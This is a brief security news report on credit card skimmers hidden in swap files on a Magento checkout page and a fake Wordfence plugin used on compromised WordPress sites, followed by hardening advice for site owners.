Hackers target Magento websites
Hackers have been observed using swap files in compromised websites to conceal credit card skimmers and harvest payment information. Sucuri identified this technique on a Magento e-commerce site’s checkout page, where the malware survived multiple cleanup attempts.
The skimmer captures data from the credit card form and exfiltrates details to an attacker-controlled domain, “amazon-analytic[.]com,” registered in February 2024. Security researcher Matt Morrow noted that using popular brand names in domain names is a common tactic by bad actors to evade detection.
The threat actor employs several defense evasion methods, including using swap files (“bootstrap.php-swapme”) to load malicious code while keeping the original file (“bootstrap.php”) intact. Attackers leverage swap files created during SSH sessions to maintain malware presence and evade detection. Although it’s unclear how initial access was gained, SSH or other terminal sessions are suspected.
Meanwhile, compromised administrator accounts on WordPress sites are being used to install a malicious plugin that mimics the legitimate Wordfence plugin. This plugin can create rogue admin users and disable Wordfence while falsely appearing functional. Security researcher Ben Martin highlighted that the malicious code only activates on WordPress admin interface pages containing “Wordfence” in their URL.
Site owners are advised to restrict FTP, sFTP, and SSH to trusted IP addresses, keep content management systems and plugins up-to-date, enable two-factor authentication (2FA), use firewalls to block bots, and enforce additional wp-config.php security measures like DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS.
